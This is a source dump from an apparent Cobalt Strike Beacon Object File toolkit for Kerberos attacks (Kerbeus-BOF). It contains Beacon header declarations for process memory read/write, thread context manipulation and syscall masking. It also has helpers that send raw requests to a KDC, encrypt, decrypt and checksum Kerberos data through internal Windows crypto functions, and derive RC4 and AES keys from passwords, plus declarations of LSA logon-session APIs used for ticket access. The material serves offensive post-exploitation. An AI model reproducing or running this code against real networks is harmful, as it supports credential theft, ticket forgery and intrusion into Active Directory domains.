DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, SIZE_T infoSize, BOOL resolveIfNotInitialized);

/* Beacon System call functions which will use the current system call method */
DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle);
DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId);
DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId);
DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object);
DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress);
DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length);
DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

/* Beacon Gate APIs */
DECLSPEC_IMPORT VOID BeaconDisableBeaconGate();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGate();

DECLSPEC_IMPORT VOID BeaconDisableBeaconGateMasking();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGateMasking();

/* Beacon User Data
 *
 * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 * e.g. 0x040900 -> CS 4.9
 *      0x041000 -> CS 4.10
*/

#define DLL_BEACON_USER_DATA 0x0d
#define BEACON_USER_DATA_CUSTOM_SIZE 32
typedef struct
{
	unsigned int version;
	PSYSCALL_API syscalls;
	char         custom[BEACON_USER_DATA_CUSTOM_SIZE];
	PRTL_API     rtls;
	PALLOCATED_MEMORY allocatedMemory;
} USER_DATA, * PUSER_DATA;

#ifdef __cplusplus
}
#endif // __cplusplus
#endif // _BEACON_H_


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/connection.c
================================================
#include "functions.c"

UINT my_htonl(UINT hostlong) {
    static const int endianness_test = 1;
    if (*((char*)&endianness_test) == 1)
        return ((hostlong >> 24) & 0xFF) | ((hostlong >> 8) & 0xFF00) | ((hostlong << 8) & 0xFF0000) | ((hostlong << 24) & 0xFF000000);
    else
        return hostlong;
}

UINT my_ntohl(UINT netlong) {
    return my_htonl(netlong);
}

void sendBytes(char* server, char* port, PBYTE content, int contentSize, PBYTE* response, int* size) {
    WSADATA wsaData;
    int iResult = WS2_32$WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        PRINT_OUT("[x] Failed to start WSA Winsocks: %d\n", iResult);
        return;
    }

    struct addrinfo hints = { 0 };
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    struct addrinfo* result = NULL;
    iResult = WS2_32$getaddrinfo(server, port, &hints, &result);
    if (iResult != 0) {
        PRINT_OUT("[x] Failed to get KDC IP info: %d\n", iResult);
        WS2_32$WSACleanup();
        return;
    }

    struct addrinfo* ptr = NULL;
    SOCKET ConnectSocket = INVALID_SOCKET;
    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

        ConnectSocket = WS2_32$socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
        if (ConnectSocket == INVALID_SOCKET) {
            PRINT_OUT("[x] Failed to connect to the KDC: %ld\n", WS2_32$WSAGetLastError());
            WS2_32$WSACleanup();
            return;
        }

        iResult = WS2_32$connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (iResult == SOCKET_ERROR) {
            WS2_32$closesocket(ConnectSocket);
            ConnectSocket = INVALID_SOCKET;
            continue;
        }
        break;
    }

    WS2_32$freeaddrinfo(result);

    if (ConnectSocket == INVALID_SOCKET) {
        PRINT_OUT("[x] Failed to connect to server!\n");
        WS2_32$WSACleanup();
        return;
    }

    int networkContentSize = my_htonl(contentSize);
    char test[4] = "";
    MemCpy(test, &networkContentSize, sizeof(int));
    iResult = WS2_32$send(ConnectSocket, test, 4, 0);
    iResult = WS2_32$send(ConnectSocket, content, contentSize, 0);
    if (iResult == SOCKET_ERROR) {
        PRINT_OUT("[x] Failed to write data: %d\n", WS2_32$WSAGetLastError());
        WS2_32$closesocket(ConnectSocket);
        WS2_32$WSACleanup();
        return;
    }

    char sizeBuff[4] = "";
    iResult = WS2_32$recv(ConnectSocket, sizeBuff, 4, 0);
    if (iResult < 0) {
        PRINT_OUT("[x] Failed to receive data size from KDC: %d\n", WS2_32$WSAGetLastError());
        return;
    }

    MemCpy(size, sizeBuff, sizeof(int));
    *size = my_ntohl(*size) & 0x7fffffff;

    *response = MemAlloc(*size);
    if (!*response) {
        PRINT_OUT("[x] Failed to allocate KDC response buffer\n");
        return;
    }
    PBYTE buff = *response;
    int bufferSize = 0;
    do {
        iResult = WS2_32$recv(ConnectSocket, buff, *size, 0);
        if (iResult < 0) {
            PRINT_OUT("[x] Failed to receive data size from KDC: %d\n", WS2_32$WSAGetLastError());
            return;
        }
        buff += iResult;
        bufferSize += iResult;
    } while (bufferSize != *size);

    WS2_32$closesocket(ConnectSocket);
    WS2_32$WSACleanup();
}


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_b64.c
================================================
#pragma once
#include "functions.c"

char* base64_encode(byte* input, size_t input_len) {
    char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    size_t output_len = 4 * ((input_len + 2) / 3);
    byte* output = MemAlloc(output_len + 1);
    if (output == NULL)
        return NULL;

    size_t i = 0, j = 0;
    while (i < input_len) {
        UINT octet_a = i < input_len ? input[i++] : 0;
        UINT octet_b = i < input_len ? input[i++] : 0;
        UINT octet_c = i < input_len ? input[i++] : 0;

        UINT triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c;

        output[j++] = base64_chars[(triple >> 3 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 2 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 1 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 0 * 6) & 0x3F];
    }

    if (input_len % 3 == 1) {
        output[output_len - 1] = '=';
        output[output_len - 2] = '=';
    }
    else if (input_len % 3 == 2) {
        output[output_len - 1] = '=';
    }

    output[output_len] = '\0';
    return output;
}

int base64_decode_char(char c) {
    if (c >= 'A' && c <= 'Z')
        return c - 'A';
    if (c >= 'a' && c <= 'z')
        return c - 'a' + 26;
    if (c >= '0' && c <= '9')
        return c - '0' + 52;
    if (c == '+')
        return 62;
    if (c == '/')
        return 63;
    return -1; // Invalid character
}

byte* base64_decode(byte* input, int* output_len) {
    int input_len = my_strlen(input);
    int padding = 0;
    if (input_len == 0) {
        *output_len = 0;
        return NULL;
    }

    if (input[input_len - 1] == '=') {
        padding++;
        if (input[input_len - 2] == '=') {
            padding++;
        }
    }

    *output_len = (input_len * 3) / 4 - padding;
    byte* output = MemAlloc(*output_len);
    if (output == NULL)
        return NULL;

    size_t i = 0, j = 0;
    while (i < input_len - padding) {
        UINT sextet_a = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_b = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_c = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_d = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);

        UINT triple = (sextet_a << 18) + (sextet_b << 12) + (sextet_c << 6) + sextet_d;

        if (j < *output_len)
            output[j++] = (triple >> 16) & 0xFF;
        if (j < *output_len)
            output[j++] = (triple >> 8) & 0xFF;
        if (j < *output_len)
            output[j++] = triple & 0xFF;
    }
    return output;
}

================================================
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_checksum.c
================================================
#pragma once
#include "_include/functions.c"

BOOL checksum(byte* key, int key_length, byte* data, int data_length, int chksumUsage, int keyUsage, byte** result, DWORD* size) {
    PKERB_CHECKSUM pCheckSum;
    PVOID pContext;

    if (!NT_SUCCESS(CDLocateCheckSum(chksumUsage, &pCheckSum))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }

    if (!NT_SUCCESS(pCheckSum->InitializeEx(key, key_length, keyUsage, &pContext))) {
        PRINT_OUT("[x] Failed to initialize crypto system");
        return TRUE;
    }

    *size = pCheckSum->CheckSumSize;
    *result = MemAlloc(*size);

    pCheckSum->Sum(pContext, data_length, data);
    pCheckSum->Finalize(pContext, *result);
    pCheckSum->Finish(&pContext);

    return FALSE;
}

================================================
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_dec.c
================================================
#pragma once
#include "functions.c"

BOOL decrypt(byte* key, DWORD eType, DWORD keyUsage, byte* data, int dataSize, byte** result, int* size) {
    PKERB_ECRYPT pCSystem;
    PVOID		 pContext;
    NTSTATUS	 status;

    status = CDLocateCSystem(eType, &pCSystem);
    if (!NT_SUCCESS(status)) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }

    status = pCSystem->Initialize(key, pCSystem->KeySize, keyUsage, &pContext);
    if (!NT_SUCCESS(status)) {
        PRINT_OUT("[x] Failed to initialize crypto system");
        return TRUE;
    }

    *result = MemAlloc(dataSize);
    *size = dataSize;
    status = pCSystem->Decrypt(pContext, data, dataSize, *result, size);

    pCSystem->Finish(&pContext);
    return FALSE;
}

================================================
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_enc.c
================================================
#pragma once
#include "functions.c"

BOOL encrypt(byte* rawBytes, int rawSize, byte* key, DWORD eType, int keyUsage, byte** result, DWORD* size) {
    PKERB_ECRYPT pCSystem;
    PVOID pContext;
    BOOL status = FALSE;

    if (!NT_SUCCESS(CDLocateCSystem(eType, &pCSystem))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }

    if (!NT_SUCCESS(pCSystem->Initialize(key, pCSystem->KeySize, keyUsage, &pContext))) {
        PRINT_OUT("[x] Failed to initialize crypto system");
        return TRUE;
    }
    *size = rawSize;

    DWORD modulo = *size % pCSystem->BlockSize;
    if (modulo)
        *size += pCSystem->BlockSize - modulo;

    *size += pCSystem->HeaderSize;
    *result = MemAlloc(*size);

    if (*result) {
        if (!NT_SUCCESS(pCSystem->Encrypt(pContext, rawBytes, rawSize, *result, size))) {
            PRINT_OUT("[x] Failed to encrypt data");
            status = TRUE;
        }
    }
    else {
        PRINT_OUT("[x] Failed alloc memory");
        status = TRUE;
    }

    pCSystem->Finish(&pContext);
    return status;
}

================================================
FILE: AD-BOF/Kerbeus-BOF/_include/crypt_key.c
================================================
#pragma once
#include "functions.c"

BOOL char2unicode(char* source, UNICODE_STRING* result) {
    STRING ansiPassword;

    RtlInitAnsiString(&ansiPassword, source);
    return RtlAnsiStringToUnicodeString(result, &ansiPassword, 1) != 0;
}

BOOL get_key_rc4(char* password, byte** hash, int* size) {
    BOOL		 status = FALSE;
    PKERB_ECRYPT pCSystem;

    if (!NT_SUCCESS(CDLocateCSystem(rc4_hmac, &pCSystem))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }

    STRING ansiPassword;
    UNICODE_STRING unicodePassword;
    UNICODE_STRING Salt;
    *size = pCSystem->KeySize;

    char2unicode(password, &unicodePassword);
    RtlInitUnicodeString(&Salt, L"");

    *hash = MemAlloc(pCSystem->KeySize);
    if (*hash) {
        pCSystem->HashPassword_NT6(&unicodePassword, &Salt, 4096, *hash);
        return FALSE;
    }
    else {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
}

BOOL get_key_aes128(char* domain, char* username, char* password, byte** hash, int* size) {
    BOOL		 status = FALSE;
    PKERB_ECRYPT pCSystem;

    if (!NT_SUCCESS(CDLocateCSystem(aes128_cts_hmac_sha1, &pCSystem))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }
    *size = pCSystem->KeySize;

    int domain_size = my_strlen(domain);
    int username_size = my_strlen(username);

    char* salt;
    if (username[username_size - 1] == '$') {
        salt = MemAlloc(domain_size * 2 + username_size + 5);
        if (!salt) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        int i, j;
        for (i = 0; i < domain_size; i++)
            salt[i] = my_toupper(domain[i]);
        salt[i++] = 'h';
        salt[i++] = 'o';
        salt[i++] = 's';
        salt[i++] = 't';
        for (j = 0; j < username_size - 1; j++)
            salt[i + j] = my_tolower(username[j]);
        i = i + j;
        salt[i++] = '.';
        for (j = 0; j < domain_size; j++)
            salt[i + j] = my_tolower(domain[j]);
        salt[domain_size * 2 + username_size + 4] = 0;
    }
    else {
        salt = MemAlloc(domain_size + username_size + 1);
        if (!salt) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        int i, j;
        for (i = 0; i < domain_size; i++)
            salt[i] = my_toupper(domain[i]);
        for (j = 0; j < username_size; j++)
            salt[i + j] = my_tolower(username[j]);
        salt[domain_size + username_size] = 0;
    }

    UNICODE_STRING unicodePassword;
    UNICODE_STRING unicodeSalt;

    char2unicode(password, &unicodePassword);
    char2unicode(salt, &unicodeSalt);

    *hash = MemAlloc(pCSystem->KeySize);
    if (*hash) {
        pCSystem->HashPassword_NT6(&unicodePassword, &unicodeSalt, 4096, *hash);
        return FALSE;
    }
    else {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
}

BOOL get_key_aes128_with_salt(char* domain, char* username, char* password, char* customSalt, byte** hash, int* size) {
    BOOL		 status = FALSE;
    PKERB_ECRYPT pCSystem;

    if (!NT_SUCCESS(CDLocateCSystem(aes128_cts_hmac_sha1, &pCSystem))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }
    *size = pCSystem->KeySize;

    char* salt;
    if (customSalt && my_strlen(customSalt) > 0) {
        int salt_len = my_strlen(customSalt);
        salt = MemAlloc(salt_len + 1);
        if (!salt) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        MemCpy(salt, customSalt, salt_len + 1);
    }
    else {
        int domain_size = my_strlen(domain);
        int username_size = my_strlen(username);

        if (username[username_size - 1] == '$') {
            salt = MemAlloc(domain_size * 2 + username_size + 5);
            if (!salt) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            int i, j;
            for (i = 0; i < domain_size; i++)
                salt[i] = my_toupper(domain[i]);
            salt[i++] = 'h';
            salt[i++] = 'o';
            salt[i++] = 's';
            salt[i++] = 't';
            for (j = 0; j < username_size - 1; j++)
                salt[i + j] = my_tolower(username[j]);
            i = i + j;
            salt[i++] = '.';
            for (j = 0; j < domain_size; j++)
                salt[i + j] = my_tolower(domain[j]);
            salt[domain_size * 2 + username_size + 4] = 0;
        }
        else {
            salt = MemAlloc(domain_size + username_size + 1);
            if (!salt) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            int i, j;
            for (i = 0; i < domain_size; i++)
                salt[i] = my_toupper(domain[i]);
            for (j = 0; j < username_size; j++)
                salt[i + j] = my_tolower(username[j]);
            salt[domain_size + username_size] = 0;
        }
    }

    UNICODE_STRING unicodePassword;
    UNICODE_STRING unicodeSalt;

    char2unicode(password, &unicodePassword);
    char2unicode(salt, &unicodeSalt);

    *hash = MemAlloc(pCSystem->KeySize);
    if (*hash) {
        pCSystem->HashPassword_NT6(&unicodePassword, &unicodeSalt, 4096, *hash);
        return FALSE;
    }
    else {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
}

BOOL get_key_aes256_with_salt(char* domain, char* username, char* password, char* customSalt, byte** hash, int* size) {
    BOOL		 status = FALSE;
    PKERB_ECRYPT pCSystem;

    if (!NT_SUCCESS(CDLocateCSystem(aes256_cts_hmac_sha1, &pCSystem))) {
        PRINT_OUT("[x] Failed to call CDLocateCSystem");
        return TRUE;
    }
    *size = pCSystem->KeySize;

    char* salt;
    if (customSalt && my_strlen(customSalt) > 0) {
        // Use custom salt from KDC (for Protected Users)
        int salt_len = my_strlen(customSalt);
        salt = MemAlloc(salt_len + 1);
        if (!salt) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        MemCpy(salt, customSalt, salt_len + 1);
    }
    else {
        // Generate default salt
        int domain_size = my_strlen(domain);
        int username_size = my_strlen(username);

        if (username[username_size - 1] == '$') {
            salt = MemAlloc(domain_size * 2 + username_size + 5);
            if (!salt) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            int i, j;
            for (i = 0; i < domain_size; i++)
                salt[i] = my_toupper(domain[i]);
            salt[i++] = 'h';
            salt[i++] = 'o';
            salt[i++] = 's';
            salt[i++] = 't';
            for (j = 0; j < username_size - 1; j++)
                salt[i + j] = my_tolower(username[j]);
            i = i + j;
            salt[i++] = '.';
            for (j = 0; j < domain_size; j++)
                salt[i + j] = my_tolower(domain[j]);
            salt[domain_size * 2 + username_size + 4] = 0;
        }
        else {
            salt = MemAlloc(domain_size + username_size + 1);
            if (!salt) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            int i, j;
            for (i = 0; i < domain_size; i++)
                salt[i] = my_toupper(domain[i]);
            for (j = 0; j < username_size; j++)
                salt[i + j] = username[j];
            salt[domain_size + username_size] = 0;
        }
    }

    UNICODE_STRING unicodePassword;
    UNICODE_STRING unicodeSalt;

    char2unicode(password, &unicodePassword);
    char2unicode(salt, &unicodeSalt);

    *hash = MemAlloc(pCSystem->KeySize);
    if (*hash) {
        pCSystem->HashPassword_NT6(&unicodePassword, &unicodeSalt, 4096, *hash);
        return FALSE;
    }
    else {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
}

BOOL get_key_aes256(char* domain, char* username, char* password, byte** hash, int* size) {
    return get_key_aes256_with_salt(domain, username, password, NULL, hash, size);
}

================================================
FILE: AD-BOF/Kerbeus-BOF/_include/functions.c
================================================
#pragma once
#define SECURITY_WIN32

#include "kerb_struct.h"

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <security.h>

#include <dsgetdc.h>
#include <ntsecapi.h>
#include "beacon.h"
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef struct _LOGON_SESSION_DATA {
	PSECURITY_LOGON_SESSION_DATA* sessionData;
	ULONG sessionCount;
} LOGON_SESSION_DATA, *PLOGON_SESSION_DATA;

typedef CONST UNICODE_STRING* PCUNICODE_STRING;

typedef NTSTATUS(WINAPI* PKERB_ECRYPT_INITIALIZE) (LPCVOID pbKey, ULONG KeySize, ULONG MessageType, PVOID* pContext);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_ENCRYPT) (PVOID pContext, LPCVOID pbInput, ULONG cbInput, PVOID pbOutput, ULONG* cbOutput);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_DECRYPT) (PVOID pContext, LPCVOID pbInput, ULONG cbInput, PVOID pbOutput, ULONG* cbOutput);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_FINISH) (PVOID* pContext);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_HASHPASSWORD_NT5) (PCUNICODE_STRING Password, PVOID pbKey);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_HASHPASSWORD_NT6) (PCUNICODE_STRING Password, PCUNICODE_STRING Salt, ULONG Count, PVOID pbKey);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_RANDOMKEY) (LPCVOID Seed, ULONG SeedLength, PVOID pbKey);
typedef NTSTATUS(WINAPI* PKERB_ECRYPT_CONTROL) (ULONG Function, PVOID pContext, PUCHAR InputBuffer, ULONG InputBufferSize);

typedef struct _KERB_ECRYPT {
	ULONG EncryptionType;
	ULONG BlockSize;
	ULONG ExportableEncryptionType;
	ULONG KeySize;
	ULONG HeaderSize;
	ULONG PreferredCheckSum;
	ULONG Attributes;
	PCWSTR Name;
	PKERB_ECRYPT_INITIALIZE Initialize;
	PKERB_ECRYPT_ENCRYPT Encrypt;
	PKERB_ECRYPT_DECRYPT Decrypt;
	PKERB_ECRYPT_FINISH Finish;
	union {
		PKERB_ECRYPT_HASHPASSWORD_NT5 HashPassword_NT5;
		PKERB_ECRYPT_HASHPASSWORD_NT6 HashPassword_NT6;
	};
	PKERB_ECRYPT_RANDOMKEY RandomKey;
	PKERB_ECRYPT_CONTROL Control;
	PVOID unk0_null;
	PVOID unk1_null;
	PVOID unk2_null;
} KERB_ECRYPT, * PKERB_ECRYPT;

typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_INITIALIZE) (ULONG dwSeed, PVOID* pContext);
typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_SUM) (PVOID pContext, ULONG cbData, LPCVOID pbData);
typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_FINALIZE) (PVOID pContext, PVOID pbSum);
typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_FINISH) (PVOID* pContext);
typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_INITIALIZEEX) (LPCVOID Key, ULONG KeySize, ULONG MessageType, PVOID* pContext);
typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_INITIALIZEEX2)(LPCVOID Key, ULONG KeySize, LPCVOID ChecksumToVerify, ULONG MessageType, PVOID* pContext);

typedef struct _KERB_CHECKSUM {
	ULONG CheckSumType;
	ULONG CheckSumSize;
	ULONG Attributes;
	PKERB_CHECKSUM_INITIALIZE Initialize;
	PKERB_CHECKSUM_SUM Sum;
	PKERB_CHECKSUM_FINALIZE Finalize;
	PKERB_CHECKSUM_FINISH Finish;
	PKERB_CHECKSUM_INITIALIZEEX InitializeEx;
	PKERB_CHECKSUM_INITIALIZEEX2 InitializeEx2;
} KERB_CHECKSUM, * PKERB_CHECKSUM;

typedef NTSTATUS(WINAPI* pCDLocateCheckSum)(ULONG Type, PKERB_CHECKSUM* ppCheckSum);
typedef NTSTATUS(WINAPI* pRtlAnsiStringToUnicodeString)(PUNICODE_STRING DestinationString, STRING* SourceString, BOOLEAN AllocateDestinationString);
typedef NTSTATUS(WINAPI* pRtlInitAnsiString)(STRING* DestinationString, char* SourceString);
typedef NTSTATUS(WINAPI* pRtlInitUnicodeString)(PUNICODE_STRING, PCWSTR);
typedef NTSTATUS(WINAPI* pCDLocateCSystem)(ULONG Type, PKERB_ECRYPT* ppCSystem);

#define KERNEL32$GetCurrentProcess() (HANDLE)(-1)
#define KERNEL32$GetCurrentThread() (HANDLE)(-2)

WINBASEAPI DWORD WINAPI NETAPI32$DsGetDcNameA(LPCSTR ComputerName, LPCSTR DomainName, GUID* DomainGuid, LPCSTR SiteName, ULONG Flags, PDOMAIN_CONTROLLER_INFOA* DomainControllerInfo);
WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer);

DECLSPEC_IMPORT int __stdcall WS2_32$WSAGetLastError();
DECLSPEC_IMPORT int __stdcall WS2_32$getaddrinfo(char* host, char* port, const struct addrinfo* hints, struct addrinfo** result);
DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol);
DECLSPEC_IMPORT int __stdcall WS2_32$closesocket(SOCKET sock);
DECLSPEC_IMPORT int WSAAPI WS2_32$send(SOCKET s, const char* buf, int len, int flags);
DECLSPEC_IMPORT int WSAAPI WS2_32$recv(SOCKET s, char* buf, int len, int flags);
DECLSPEC_IMPORT int WSAAPI WS2_32$connect(SOCKET, const SOCKADDR*, INT);
DECLSPEC_IMPORT void __stdcall WS2_32$freeaddrinfo(struct addrinfo* ai);
DECLSPEC_IMPORT int WSAAPI WS2_32$WSACleanup();
DECLSPEC_IMPORT int WSAAPI WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData);

WINBASEAPI int __cdecl MSVCRT$sprintf(char* __stream, const char* __format, ...);
WINBASEAPI int __cdecl MSVCRT$vsnprintf(char* d, size_t n, const char* format, va_list arg);
WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict _Dst, const void* __restrict _Src, size_t _MaxCount);

WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);

WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
WINBASEAPI BOOL WINAPI KERNEL32$VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime(CONST FILETIME* lpFileTime, LPSYSTEMTIME lpSystemTime);
WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
WINBASEAPI int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
WINBASEAPI BOOL WINAPI KERNEL32$GetComputerNameA(LPSTR lpBuffer, LPDWORD nSize);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError();
WINBASEAPI BOOL WINAPI KERNEL32$SystemTimeToFileTime(CONST SYSTEMTIME* lpSystemTime, LPFILETIME lpFileTime);
WINBASEAPI VOID WINAPI KERNEL32$GetLocalTime(LPSYSTEMTIME lpSystemTime);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemTime(LPSYSTEMTIME lpSystemTime);


typedef WINADVAPI BOOL (WINAPI* _ConvertSidToStringSidA)(PSID Sid,LPSTR *StringSid);
typedef WINADVAPI BOOL (__stdcall* _SystemFunction036)(_Out_writes_bytes_(RandomBufferLength) PVOID RandomBuffer, _In_ ULONG RandomBufferLength);
typedef WINADVAPI BOOL (WINAPI* _GetTokenInformation)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
typedef WINADVAPI BOOL (WINAPI* _OpenThreadToken)(HANDLE ThreadHandle, DWORD DesiredAccess, BOOL OpenAsSelf, PHANDLE TokenHandle);
typedef WINADVAPI BOOL (WINAPI* _OpenProcessToken)(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
typedef WINADVAPI BOOL (WINAPI* _AllocateAndInitializeSid)(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID* pSid);
typedef WINADVAPI BOOL (WINAPI* _EqualSid)(PSID pSid1, PSID pSid2);
typedef WINADVAPI PVOID (WINAPI* _FreeSid)(PSID pSid);

typedef WINBASEAPI NTSTATUS (WINAPI* _LsaConnectUntrusted)(PHANDLE LsaHandle);
typedef WINBASEAPI NTSTATUS (WINAPI* _LsaRegisterLogonProcess)(PLSA_STRING LogonProcessName, PHANDLE LsaHandle, PLSA_OPERATIONAL_MODE SecurityMode);
typedef WINBASEAPI NTSTATUS (WINAPI* _LsaGetLogonSessionData)(PLUID LogonId, PSECURITY_LOGON_SESSION_DATA* ppLogonSessionData);
typedef WINBASEAPI NTSTATUS (WINAPI* _LsaEnumerateLogonSessions)(PULONG LogonSessionCount, PLUID* LogonSessionList);
typedef WINBASEAPI NTSTATUS (NTAPI* _LsaFreeReturnBuffer)(PVOID Buffer);
typedef WINBASEAPI NTSTATUS (WINAPI* _LsaCallAuthenticationPackage)(HANDLE LsaHandle, ULONG AuthenticationPackage, PVOID ProtocolSubmitBuffer, ULONG SubmitBufferLength, PVOID* ProtocolReturnBuffer, PULONG ReturnBufferLength, PNTSTATUS ProtocolStatus);
typedef WINBASEAPI NTSTATUS (NTAPI* _LsaDeregisterLogonProcess)(HANDLE LsaHandle);
typedef WINBASEAPI NTSTATUS (WINAPI* _LsaLookupAuthenticationPackage)(HANDLE LsaHandle, PLSA_STRING PackageName, PULONG AuthenticationPackage);
